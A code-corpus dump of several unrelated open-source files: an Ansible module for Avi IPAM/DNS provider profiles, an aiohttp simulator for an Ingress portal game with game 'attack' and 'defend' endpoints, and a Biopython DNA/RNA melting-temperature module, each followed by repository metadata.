plt.savefig(self.IO['savepath']+'/'+self.IO['name']+'_sorting.png',dpi=300)
plt.close()
|
mac389/brainpy
|
lib/Recording.py
|
Python
|
gpl-3.0
| 13,114
|
[
"Brian"
] |
370795ed0b45320bfcc06227ca69796c18ba1b417e30dc2bb677c9a09c9dba77
|
#!/usr/bin/python
#
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
#
# Copyright: (c) 2017 Gaurav Rastogi, <grastogi@avinetworks.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_ipamdnsproviderprofile
author: Gaurav Rastogi (@grastogi23) <grastogi@avinetworks.com>
short_description: Module for setup of IpamDnsProviderProfile Avi RESTful Object
description:
- This module is used to configure IpamDnsProviderProfile object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
allocate_ip_in_vrf:
description:
- If this flag is set, only allocate ip from networks in the virtual service vrf.
- Applicable for avi vantage ipam only.
- Field introduced in 17.2.4.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.5"
type: bool
aws_profile:
description:
- Provider details if type is aws.
azure_profile:
description:
- Provider details if type is microsoft azure.
- Field introduced in 17.2.1.
version_added: "2.5"
custom_profile:
description:
- Provider details if type is custom.
- Field introduced in 17.1.1.
gcp_profile:
description:
- Provider details if type is google cloud.
infoblox_profile:
description:
- Provider details if type is infoblox.
internal_profile:
description:
- Provider details if type is avi.
name:
description:
- Name for the ipam/dns provider profile.
required: true
openstack_profile:
description:
- Provider details if type is openstack.
proxy_configuration:
description:
- Field introduced in 17.1.1.
tenant_ref:
description:
- It is a reference to an object of type tenant.
type:
description:
- Provider type for the ipam/dns provider profile.
- Enum options - IPAMDNS_TYPE_INFOBLOX, IPAMDNS_TYPE_AWS, IPAMDNS_TYPE_OPENSTACK, IPAMDNS_TYPE_GCP, IPAMDNS_TYPE_INFOBLOX_DNS, IPAMDNS_TYPE_CUSTOM,
- IPAMDNS_TYPE_CUSTOM_DNS, IPAMDNS_TYPE_AZURE, IPAMDNS_TYPE_INTERNAL, IPAMDNS_TYPE_INTERNAL_DNS, IPAMDNS_TYPE_AWS_DNS, IPAMDNS_TYPE_AZURE_DNS.
required: true
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the ipam/dns provider profile.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Create IPAM DNS provider setting
avi_ipamdnsproviderprofile:
controller: '{{ controller }}'
username: '{{ username }}'
password: '{{ password }}'
internal_profile:
dns_service_domain:
- domain_name: ashish.local
num_dns_ip: 1
pass_through: true
record_ttl: 100
- domain_name: guru.local
num_dns_ip: 1
pass_through: true
record_ttl: 200
ttl: 300
name: Ashish-DNS
tenant_ref: Demo
type: IPAMDNS_TYPE_INTERNAL
"""
RETURN = '''
obj:
description: IpamDnsProviderProfile (api/ipamdnsproviderprofile) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
allocate_ip_in_vrf=dict(type='bool',),
aws_profile=dict(type='dict',),
azure_profile=dict(type='dict',),
custom_profile=dict(type='dict',),
gcp_profile=dict(type='dict',),
infoblox_profile=dict(type='dict',),
internal_profile=dict(type='dict',),
name=dict(type='str', required=True),
openstack_profile=dict(type='dict',),
proxy_configuration=dict(type='dict',),
tenant_ref=dict(type='str',),
type=dict(type='str', required=True),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'ipamdnsproviderprofile',
set([]))
if __name__ == '__main__':
main()
|
alxgu/ansible
|
lib/ansible/modules/network/avi/avi_ipamdnsproviderprofile.py
|
Python
|
gpl-3.0
| 5,896
|
[
"VisIt"
] |
bd3def9f45d5b3ae5637f47a9b3ed31f52d6170dc95fe8c9e9770a42611646e6
|
#!/usr/bin/env python3
### VERY MUCH PYTHON 3 !!!
"""
Example for aiohttp.web basic server
Uses a background timer to read from a file to update a shared datastructure
Because it's going to be used as a simulator
Made available under the MIT license as follows:
Copyright 2017 Brian Bulkowski brian@bulkowski.org
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import sys
if sys.version_info[0] < 3:
raise "Must be using Python 3"
import threading
import time
import datetime
import os
import itertools
import copy
import json
import argparse
import traceback
import asyncio
import textwrap
from aiohttp import web
from random import randint
# Relay class
class Relay:
def __init__(self):
# 1 is "NO and NC", 0 is "Flipped"
self.state = 0
# 0, 1, 2, 3 are possible
# 1 = relay is NC /NO when portal is controlled, reversed when neutral
# 2 = relay is reversed when portal is controlled, NO/NC when neutral
# 3 = relay is NC /NO when portal is controlled, reversed for 3 seconds when faction changes, then reverts to NO/NC
# 4 = relay closed when portal is controlled, reversed for 1.5 seconds
self.mode = 0
# todo: since a mod has an owner, should make it a class as well, for parallelism sake
# Resonator class... because portals have more than one resonator
class Resonator:
valid_positions = [ "E", "NE", "N", "NW", "W", "SW", "S", "SE" ]
level_energy = [0, 10, 15, 20, 25, 30, 40, 50, 60]
def __init__(self, position, values=None ):
# print ("Resonator create: position ",position)
self.position = position
if values == None:
self.level = 0
self.health = 0
self.distance = 0
# may not update position, not a value
self.owner = ""
else:
self.level = int(values.get("level",0))
self.health = int(values.get("health",0))
self.distance = int(values.get("distance",0))
self.owner = str(values.get("owner", ""))
if (self.level == 0) or (self.health == 0):
self.level = 0
self.health = 0
self.distance = 0
# note: position does not change
self.owner = ""
# print ("Resontaor level: ",self.level)
def check(self):
if type(self.level) is not int:
print("bad level type ",type(self.level))
return False
if self.level < 0 or self.level > 8:
print("bad level value ",self.level)
return False
if type(self.health) is not int:
print("bad level health type ",type(self.health))
return False
if self.health < 0 or self.health > 100:
print("bad level value ",self.health)
return False
if type(self.position) is not str:
print("bad position type ",type(self.position))
return False
if self.position not in self.valid_positions:
print("bad position: ",self.position)
return False
if type(self.distance) is not int:
print("bad distance type ",type(self.distance))
return False
if self.distance < 0 or self.distance > 100:
print("bad distance value ",self.distance)
return False
if (self.level == 0) and (self.health > 0):
print("zero level and non-zero health: illegal ")
return False
if (self.health == 0) and (self.level > 0):
print("zero health and non-zero level: illegal ")
return False
return True
def setLevel(self, level):
# wire up debugging....
if level > 8:
return False
if level < 0:
return False
self.level = level
if level == 0:
self.health = 0
self.distance = 0
return True
def setHealth(self, health):
if health > 100:
return False
if health < 0:
return False
self.health = health
if health == 0:
self.level = 0
self.distance = 0
return True
def addEnergy(self, concentrated=False):
if self.level == 0:
# special case - take it to level 1, 100%
self.level = 1
self.health = 100
else:
if concentrated:
deltaEnergy = 10 * randint(15,25)
else:
deltaEnergy = 10 * randint(10,25)
newEnergy = self.health * Resonator.level_energy[self.level] + deltaEnergy;
newHealth = int(newEnergy/Resonator.level_energy[self.level])
minHealth = min(self.health + 1, 100);
if (newHealth > 100) :
if self.level < 8:
self.setLevel(min(8, self.level+1))
self.setHealth(max(minHealth, newEnergy/Resonator.level_energy[self.level]))
else:
self.setHealth(100)
else:
self.setHealth(newHealth);
def removeEnergy(self, concentrated=False):
if (self.level == 0):
return
if concentrated:
deltaEnergy = 10 * randint(25,45)
else:
deltaEnergy = 10 * randint(10,25)
newEnergy = self.health * Resonator.level_energy[self.level] - deltaEnergy
newHealth = int(newEnergy/Resonator.level_energy[self.level])
self.setHealth(max(0, newHealth));
def toLegacyStr(self):
# print (" grabbing reso string: level ",self.level)
return '{{"level": {0}, "health": {1}, "position": "{2}"}}'.format(self.level, self.health, self.position)
# without the position, sometimes that is implied
def toBetterStr(self):
if self.level == 0:
return'"{0}": {{"level": {1} }}'.format(self.position, self.level)
else:
return '"{0}": {{"level": {1}, "health": {2}, "distance": {3} }}'.format(self.position, self.level, self.health, self.distance)
# WARNING! This class has multithreaded access.
# Before you access the data structure, grab the lock and release afterward
# do not do anything blocking under the lock
class Portal:
valid_positions = [ "E", "NE", "N", "NW", "W", "SW", "S", "SE" ]
valid_mods = ["FA","HS-C","HS-R","HS-VR","LA-R","LA-VR","SBUL","MH-C","MH-R","MH-VR","PS-C","PS-R","PS-VR","AXA","T"]
reso_level_XM = [0.0, 1000.0, 1500.0, 2000.0, 2500.0, 3000.0, 4000.0, 5000.0, 6000.0 ]
factionStr = ["neutral", "enlightenment", "resistance"]
@staticmethod
def getFactionId(faction):
for idx in range(len(Portal.factionStr)):
if Portal.factionStr[idx] == faction:
print("Get faction id returns {0} for {1}".format(idx, faction))
return idx
return 0
def __init__(self, id_, verbose):
self.reset()
self.id_ = id_
self.title = "default portal"
self.lock = threading.Lock()
self.create_time = time.time()
self.verbose = verbose
# print("Created a new portal object")
def reset(self):
self.faction = 0
self.health = 0
self.level = 0
self.owner = None
self.resonators = {}
self.links = []
self.mods = []
def addEnergy(self,faction, resonatorId):
with self.lock:
if self.faction == 0:
self.faction = faction
# clear out resonators, initalize fresh
for position in Resonator.valid_positions:
reso = Resonator(position, {"level":1, "health":100, "owner":faction})
self.resonators[position]=reso
else:
if resonatorId:
self.resonators[resonatorId].addEnergy(concentrated=True)
else:
for pos, resonator in self.resonators.items():
resonator.addEnergy();
def removeEnergy(self, resonatorId):
with self.lock:
if resonatorId:
self.resonators[resonatorId].removeEnergy(concentrated=True)
else:
for pos, resonator in self.resonators.items():
resonator.removeEnergy();
regimeStable = False
for pos, resonator in self.resonators.items():
if (resonator.health > 0):
regimeStable = True
if not regimeStable:
self.faction = 0 # all resonators down. Back to neutral
# returns a new object of the Portal type
def dup(self):
n = Portal(self.id_, self.verbose)
n.faction = self.faction
n.health = self.health
n.level = self.level
n.title = self.title
n.owner = self.owner
if self.resonators:
n.resonators = self.resonators
if self.links:
n.links = self.links
if self.mods:
n.mods = self.mods
n.lock = None
n.create_time = self.create_time
# print("Created a duplicate portal object")
return n
# carefully avoid the lock and the creattime
# otherwise we're copying the object into the self
# no return
def set(self, n):
self.faction = n.faction
self.health = n.health
self.level = n.level
self.title = n.title
self.owner = n.owner
self.resonators = n.resonators
self.links = n.links
self.mods = n.mods
self.verbose = n.verbose
# Health is calculated from resonators states so it is always correct
def getLevel(self):
if self.faction == 0:
return 0
if self.resonators == None:
return 0
if len(self.resonators) == 0:
return 0
level_sum = 0
for k,v in self.resonators.items():
level_sum += v.level
return int (level_sum / 8)
# health is in .... ???
# Let's try average of the health of the resonators
def getHealth(self):
if self.faction == 0:
return 0
if self.resonators == None:
return 0
if len(self.resonators) == 0:
return 0
if self.faction == 0:
return 0
xm_max = 0.0
xm = 0.0
for k,v in self.resonators.items():
reso_xm = self.reso_level_XM[v.level]
xm_max += reso_xm
xm += (float(v.health) / 100.0) * reso_xm
if xm < 0.00001:
return 0
r = int ((xm / xm_max) * 100.0)
if r > 100:
r = 100
return r
# This function takes a Json object
# Returns a float for how long to delay - when to read the next line
def setStatus( self, jsonStr ):
try:
statusObj = json.loads(jsonStr)
except Exception as ex:
template = "Exception in Portal parsing the json string {0} occurred. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print( message )
raise # pass it upstack
if self.verbose:
print ("+++++ object BEFORE changes: ",str(self))
# print(" parsed JSON, taking lock. Object is: ",statusObj)
with self.lock:
portal = self.dup()
if "title" in statusObj:
if statusObj.get("title"):
portal.title = str(statusObj.get("title"))
if "faction" in statusObj:
portal.faction = int(statusObj.get("faction"))
# have to take off all resos
if portal.faction == 0:
portal.resonators = {}
portal.mods = []
portal.health = 0
portal.level = 0
portal.owner = None
if "owner" in statusObj:
portal.owner = str(statusObj.get("owner"))
if "mods" in statusObj:
portal.mods = list(statusObj.get("mods"))
if "resonators" in statusObj:
resonators = dict(statusObj.get("resonators"))
for pos, values in resonators.items():
r = Resonator(pos, values)
portal.resonators[pos] = r
# if we changed the resonators, update the health and level
portal.level = portal.getLevel()
portal.health = portal.getHealth()
# validate the new object through the validator
if portal.check() == False:
raise ValueError('JSON Portal line is not consistant')
else:
# copy the parts that should be copied ( ie, not the lock or create time )
with self.lock:
self.set(portal)
if self.verbose:
print ("+++++ object after changes: ",str(self))
# return value is the amount of delay to add
if type(statusObj.get("delay", 0.0)) == float:
delay = statusObj.get("delay", 0.0)
return delay
def getModsStr(self):
if type(self.mods) != list:
return '[]'
if len(self.mods) == 0:
return '[]'
res = []
res.append('[')
for mod in self.mods:
res.append('"')
res.append(mod)
res.append('"')
res.append(',')
res.pop()
res.append(']')
return ''.join(res)
# This is the "current form" that is mussing a lot of information
def statusLegacy(self):
resos = []
num_entries = 0
for k, v in self.resonators.items():
# skip if empty, saving space & time
# print(" r position ",k," value ",str(v))
if v.level == 0:
continue
num_entries += 1
resos.append(v.toLegacyStr())
resos.append(",")
# have to take off the last comma if more than one item
if num_entries > 0:
resos.pop()
reso_string = ''.join(resos)
return '{{"controllingFaction": {0}, "health": {1}, "level": {2}, "title": "{3}", "resonators": [{4}]}}'.format(
self.faction, self.health, self.level, self.title, reso_string )
# not legacy! The cool kid way with resonators as a dict
def __str__(self):
# shortcut - grey
if (self.faction == 0):
return '{{"faction": 0, "health": 0, "level": 0, "title":"{0}", "resonators": {{}}, "mods": [] }}'.format(self.title)
#longcut
howmany = 0
resos = []
#print ("we have {0} resonators".format(len(self.resonators)))
for pos, resonator in self.resonators.items():
# skip if empty, saving space & time
if resonator.level == 0:
continue
howmany += 1
resos.append(resonator.toBetterStr())
resos.append(",")
if (howmany > 0):
resos.pop()
reso_string = ''.join(resos)
return '{{"faction": {0}, "health": {1}, "level": "{2}", "title": "{3}", "resonators": {{{4}}}, "mods": {5} }}'.format(
self.faction, self.getHealth(), self.getLevel(), self.title, reso_string, self.getModsStr() )
# this method makes sure the status is valid and reasonable ( no values greater than game state )
def check(self):
if type(self.faction) is not int:
print("Portal faction type initvalid, is ",type(self.faction))
return False
if self.faction < 0 or self.faction > 2:
print("Illegal Portal faction value ",self.faction)
return False
if type(self.health) is not int:
print("Portal health type invalid, is ",type(self.health))
return False
if self.health < 0 or self.health > 100:
print("Illegal Portal health value ",self.health)
return False
if type(self.level) is not int:
print("Portal level type invalid, is ",type(self.level))
return False
if self.level < 0 or self.level > 8:
print("Illegal Portal level value ",self.level)
return False
if type(self.title) is not str:
print("Portal title type invalid, is ",type(self.title))
return False
if len(self.title) > 300:
print("Portal title seems too long")
return False
if type(self.resonators) is not dict:
print("Portal resonator type wrong, is ",type(self.resonators))
return False
if len(self.resonators) > 8:
print("Portal has incorrect number of resonators ",len(self.resontaors))
return False
if (self.faction == 0) and (len(self.resonators) > 0):
print(" portal must have faction if it has resonators ")
return False
for k,v in self.resonators.items():
if k not in self.valid_positions:
print("resonator has invalid position ",k)
return False
if v.check() == False:
print(" resonator ",v," is not valid ")
return False
if type(self.mods) is not list:
print("Mods wrong type, is ",type(self.mods))
return False
if len(self.mods) > 4:
print("too many mods")
return False
if (self.faction == 0) and (len(self.mods) > 0):
print(" portal must have faction if it has resonators ")
return False
for m in self.mods:
if type(m) is not str:
print (" type of one of the mods is wrong, is ",type(m))
return False
if m not in self.valid_mods:
print ("invalid mod ",m)
return False
return True
#
# Background file processor
# 1. Open a file
# 2. Readline and set initial based on readline
# this is a co-routine. Post Python 3.5 the coroutine decorator turned into 'async'
async def fileReader(app):
# file object
f = None
file_line = 0
portal = app['portal']
file_name = app['filename']
verbose = app['verbose']
while True:
# for i in itertools.count():
# if no file object open one
if f == None:
delay = 0.5
try:
f = open(file_name, 'r')
file_line = 0
# print (" opened file again ")
except FileNotFoundError:
# the most likely error
print(" file ",file_name," was not found, trying again later")
except Exception as ex:
template = "An exception of type {0} occurred. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print( message )
# if file object, read and jam it into the status object
if f != None:
delay = 0.0
l = f.readline()
file_line += 1
# at end of file, close the file, allow a reopen
if len(l) == 0:
f.close()
f = None
print( " Reloading file ")
else:
l = l.rstrip()
l = l.lstrip()
if (type(l) == str and len(l) > 0):
if (l[0] == '#'):
# print("ignoring comment line")
pass
else:
try:
if verbose:
print("Portal set status: line ",file_line," using string: ",l)
delay = portal.setStatus(l)
except:
print("WARNING: could not process line ",file_line," ignoring ")
traceback.print_exc(file=sys.stdout)
if type(delay) != float:
delay = 0.0
await asyncio.sleep(delay)
#
# A number of debug / demo endpoints
# Note to self: you create a "Response" object, thn
# you manipulate it.
async def statusFaction(request):
portal = request.app['portal']
faction = 0
with portal.lock:
faction = portal.faction
return web.Response(text=str(faction))
async def statusHealth(request):
portal = request.app['portal']
health = 0
with portal.lock:
health = portal.health
return web.Response(text=str(health))
# this needs UTF8 because names might have utf8
async def statusJson(request):
portal = request.app['portal']
portal_str = ""
#print(" web request received ")
with portal.lock:
portal_str = str(portal)
return web.Response(text=portal_str , charset='utf-8', headers={"Access-Control-Allow-Origin":"*"})
async def statusJsonLegacy(request):
portal = request.app['portal']
portal_str = ""
with portal.lock:
portal_str = portal.statusLegacy()
return web.Response(text=portal_str , charset='utf-8')
# this rather pecular request does a delay, then responds, allowing you
# to test your polling code
async def delay(request):
await asyncio.sleep(10.0)
return web.Response(text="We delayed 10 seconds")
async def hello(request):
return web.Response(text="Hello World!")
# And a couple of POST functions to handle attacks and defends
async def handleAttack(request):
# get faction from request
postData = await request.post()
for key in postData:
print ("postdata key " + key)
if not "faction" in postData:
print("No faction data, will not handle post!")
return web.Response(status=400, headers={"Access-Control-Allow-Origin":"*"})
faction = postData["faction"]
if faction != "resistance" and faction != "enlightenment":
print("Invalid faction data {}, will not handle post".format(faction))
return web.Response(status=400, headers={"Access-Control-Allow-Origin":"*"})
factionId = Portal.getFactionId(faction)
portal = request.app['portal']
if Portal.factionStr[portal.faction] == faction:
print("Cannot attack own portal, will not handle post")
return web.Response(status=400, headers={"Access-Control-Allow-Origin":"*"})
if "resonator" in postData:
resonatorId = postData["resonator"]
else:
resonatorId = None
print("Removing Energy")
portal.removeEnergy(resonatorId)
return web.Response(status=200, headers={"Access-Control-Allow-Origin":"*"})
async def handleDefend(request):
# get faction from request
postData = await request.post()
if not "faction" in postData:
print("No faction data, will not handle post!")
return web.Response(status=400, headers={"Access-Control-Allow-Origin":"*"})
faction = postData["faction"]
if faction != "resistance" and faction != "enlightenment":
print("Invalid faction {}, will not handle post".format(faction))
return web.Response(status=400, headers={"Access-Control-Allow-Origin":"*"})
factionId = Portal.getFactionId(faction)
portal = request.app['portal']
print("portal.faction is " + str(portal.faction))
if Portal.factionStr[portal.faction] != "neutral" and Portal.factionStr[portal.faction] != faction:
print("Cannot defend enemy's portal, will not handle post")
return web.Response(status=400, headers={"Access-Control-Allow-Origin":"*"})
if "resonator" in postData:
resonatorId = postData["resonator"]
else:
resonatorId = None
print("Adding energy!!")
portal.addEnergy(factionId,resonatorId)
return web.Response(status=200, headers={"Access-Control-Allow-Origin":"*"})
async def handleReset(request):
portal = request.app['portal']
portal.reset()
return web.Response(status=200, headers={"Access-Control-Allow-Origin":"*"})
# background tasks are covered near the bottom of this:
# http://aiohttp.readthedocs.io/en/stable/web.html
# Whatever tasks you create here will be executed and cancelled properly
async def start_background_tasks(app):
app['file_task'] = app.loop.create_task( fileReader(app))
async def cleanup_background_tasks(app):
app['file_task'].cancel()
await app['file_task']
async def init(app, args):
app = web.Application()
app.router.add_get('/', hello)
app.router.add_get('/delay', delay)
app.router.add_get('/status/faction', statusFaction)
app.router.add_get('/status/health', statusHealth)
if args.legacy:
app.router.add_get('/status/json', statusJsonLegacy)
else:
app.router.add_get('/status/json', statusJson)
app.router.add_post('/attack', handleAttack)
app.router.add_post('/defend', handleDefend)
app.router.add_post('/reset', handleReset)
# create the shared objects
app['portal'] = Portal(1, args.verbose)
app['relay'] = Relay()
app['filename'] = args.filename
app['verbose'] = args.verbose
# background tasks are covered near the bottom of this:
# http://aiohttp.readthedocs.io/en/stable/web.html
#app.on_startup.append(start_background_tasks)
#/app.on_cleanup.append(cleanup_background_tasks)
return app
# Parse the command line options
parser = argparse.ArgumentParser(description="Ingress Portal TechThulu")
parser.add_argument('--port', '-p', help="HTTP port", default="5050", type=int)
parser.add_argument('--file', '-f', dest="filename", help="Simulator JSON file to process", default="tecthulu.json", type=str)
parser.add_argument('--legacy', help="Use legacy JSON format", action='store_true')
parser.set_defaults(legacy=False)
parser.add_argument('--verbose', '-v', help="Puts Lots of Printing Noise in", action='store_true')
parser.set_defaults(verbose=False)
args = parser.parse_args()
print("starting TechThulu simulator with file ",args.filename," on port ",args.port)
# register all the async stuff
loop = asyncio.get_event_loop()
app = loop.run_until_complete(init(web.Application(), args))
# run the web server
web.run_app(app, port=args.port)
|
bbulkow/MagnusFlora
|
sim/portal_sim_decom.py
|
Python
|
mit
| 27,153
|
[
"Brian"
] |
826f3bb9263afb2c8745cc5e321762e44699016476b480f7738c1b4099e5036e
|
# Copyright 2004-2008 by Sebastian Bassi.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Calculate the thermodynamic melting temperatures of nucleotide sequences."""
import math
def Tm_staluc(s,dnac=50,saltc=50,rna=0):
"""Returns DNA/DNA tm using nearest neighbor thermodynamics.
dnac is DNA concentration [nM]
saltc is salt concentration [mM].
rna=0 is for DNA/DNA (default), use 1 for RNA/RNA hybridisation.
For DNA/DNA, see Allawi & SantaLucia (1997), Biochemistry 36: 10581-10594
For RNA/RNA, see Xia et al (1998), Biochemistry 37: 14719-14735
Example:
>>> print "%0.2f" % Tm_staluc('CAGTCAGTACGTACGTGTACTGCCGTA')
59.87
>>> print "%0.2f" % Tm_staluc('CAGTCAGTACGTACGTGTACTGCCGTA', rna=True)
68.14
You can also use a Seq object instead of a string,
>>> from Bio.Seq import Seq
>>> from Bio.Alphabet import generic_nucleotide
>>> s = Seq('CAGTCAGTACGTACGTGTACTGCCGTA', generic_nucleotide)
>>> print "%0.2f" % Tm_staluc(s)
59.87
>>> print "%0.2f" % Tm_staluc(s, rna=True)
68.14
"""
#Credits:
#Main author: Sebastian Bassi <sbassi@genesdigitales.com>
#Overcount function: Greg Singer <singerg@tcd.ie>
#Based on the work of Nicolas Le Novere <lenov@ebi.ac.uk> Bioinformatics.
#17:1226-1227(2001)
#This function returns better results than EMBOSS DAN because it uses
#updated thermodynamics values and takes into account inicialization
#parameters from the work of SantaLucia (1998).
#Things to do:
#+Detect complementary sequences. Change K according to result.
#+Add support for heteroduplex (see Sugimoto et al. 1995).
#+Correction for Mg2+. Now supports only monovalent ions.
#+Put thermodinamics table in a external file for users to change at will
#+Add support for danglings ends (see Le Novele. 2001) and mismatches.
dh = 0 #DeltaH. Enthalpy
ds = 0 #deltaS Entropy
def tercorr(stri):
deltah = 0
deltas = 0
if rna==0:
#DNA/DNA
#Allawi and SantaLucia (1997). Biochemistry 36 : 10581-10594
if stri.startswith('G') or stri.startswith('C'):
deltah -= 0.1
deltas += 2.8
elif stri.startswith('A') or stri.startswith('T'):
deltah -= 2.3
deltas -= 4.1
if stri.endswith('G') or stri.endswith('C'):
deltah -= 0.1
deltas += 2.8
elif stri.endswith('A') or stri.endswith('T'):
deltah -= 2.3
deltas -= 4.1
dhL = dh + deltah
dsL = ds + deltas
return dsL,dhL
elif rna==1:
#RNA
if stri.startswith('G') or stri.startswith('C'):
deltah -= 3.61
deltas -= 1.5
elif stri.startswith('A') or stri.startswith('T') or \
stri.startswith('U'):
deltah -= 3.72
deltas += 10.5
if stri.endswith('G') or stri.endswith('C'):
deltah -= 3.61
deltas -= 1.5
elif stri.endswith('A') or stri.endswith('T') or \
stri.endswith('U'):
deltah -= 3.72
deltas += 10.5
dhL = dh + deltah
dsL = ds + deltas
# print "delta h=",dhL
return dsL,dhL
else:
raise ValueError("rna = %r not supported" % rna)
def overcount(st,p):
"""Returns how many p are on st, works even for overlapping"""
ocu = 0
x = 0
while True:
try:
i = st.index(p,x)
except ValueError:
break
ocu += 1
x = i + 1
return ocu
R = 1.987 # universal gas constant in Cal/degrees C*Mol
sup = str(s).upper() #turn any Seq object into a string (need index method)
vsTC, vh = tercorr(sup)
vs = vsTC
k = (dnac/4.0)*1e-9
#With complementary check on, the 4.0 should be changed to a variable.
if rna==0:
#DNA/DNA
#Allawi and SantaLucia (1997). Biochemistry 36 : 10581-10594
vh = vh + (overcount(sup,"AA"))*7.9 + (overcount(sup,"TT"))*\
7.9 + (overcount(sup,"AT"))*7.2 + (overcount(sup,"TA"))*7.2 \
+ (overcount(sup,"CA"))*8.5 + (overcount(sup,"TG"))*8.5 + \
(overcount(sup,"GT"))*8.4 + (overcount(sup,"AC"))*8.4
vh = vh + (overcount(sup,"CT"))*7.8+(overcount(sup,"AG"))*\
7.8 + (overcount(sup,"GA"))*8.2 + (overcount(sup,"TC"))*8.2
vh = vh + (overcount(sup,"CG"))*10.6+(overcount(sup,"GC"))*\
9.8 + (overcount(sup,"GG"))*8 + (overcount(sup,"CC"))*8
vs = vs + (overcount(sup,"AA"))*22.2+(overcount(sup,"TT"))*\
22.2 + (overcount(sup,"AT"))*20.4 + (overcount(sup,"TA"))*21.3
vs = vs + (overcount(sup,"CA"))*22.7+(overcount(sup,"TG"))*\
22.7 + (overcount(sup,"GT"))*22.4 + (overcount(sup,"AC"))*22.4
vs = vs + (overcount(sup,"CT"))*21.0+(overcount(sup,"AG"))*\
21.0 + (overcount(sup,"GA"))*22.2 + (overcount(sup,"TC"))*22.2
vs = vs + (overcount(sup,"CG"))*27.2+(overcount(sup,"GC"))*\
24.4 + (overcount(sup,"GG"))*19.9 + (overcount(sup,"CC"))*19.9
ds = vs
dh = vh
elif rna==1:
#RNA/RNA hybridisation of Xia et al (1998)
#Biochemistry 37: 14719-14735
vh = vh+(overcount(sup,"AA"))*6.82+(overcount(sup,"TT"))*6.6+\
(overcount(sup,"AT"))*9.38 + (overcount(sup,"TA"))*7.69+\
(overcount(sup,"CA"))*10.44 + (overcount(sup,"TG"))*10.5+\
(overcount(sup,"GT"))*11.4 + (overcount(sup,"AC"))*10.2
vh = vh + (overcount(sup,"CT"))*10.48 + (overcount(sup,"AG"))\
*7.6+(overcount(sup,"GA"))*12.44+(overcount(sup,"TC"))*13.3
vh = vh + (overcount(sup,"CG"))*10.64 + (overcount(sup,"GC"))\
*14.88+(overcount(sup,"GG"))*13.39+(overcount(sup,"CC"))*12.2
vs = vs + (overcount(sup,"AA"))*19.0 + (overcount(sup,"TT"))*\
18.4+(overcount(sup,"AT"))*26.7+(overcount(sup,"TA"))*20.5
vs = vs + (overcount(sup,"CA"))*26.9 + (overcount(sup,"TG"))*\
27.8 + (overcount(sup,"GT"))*29.5 + (overcount(sup,"AC"))*26.2
vs = vs + (overcount(sup,"CT"))*27.1 + (overcount(sup,"AG"))*\
19.2 + (overcount(sup,"GA"))*32.5 + (overcount(sup,"TC"))*35.5
vs = vs + (overcount(sup,"CG"))*26.7 + (overcount(sup,"GC"))\
*36.9 + (overcount(sup,"GG"))*32.7 + (overcount(sup,"CC"))*29.7
ds = vs
dh = vh
else:
raise ValueError("rna = %r not supported" %rna)
ds = ds-0.368*(len(s)-1)*math.log(saltc/1e3)
tm = ((1000* (-dh))/(-ds+(R * (math.log(k)))))-273.15
# print "ds="+str(ds)
# print "dh="+str(dh)
return tm
def _test():
"""Run the module's doctests (PRIVATE)."""
import doctest
print "Runing doctests..."
doctest.testmod()
print "Done"
if __name__ == "__main__":
_test()
|
bryback/quickseq
|
genescript/Bio/SeqUtils/MeltingTemp.py
|
Python
|
mit
| 7,166
|
[
"Biopython"
] |
b0eb3a05c8fdf427d3a0e78689d47bc06f501e42a7bea13e9ad8a6e6d389ac47
|
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
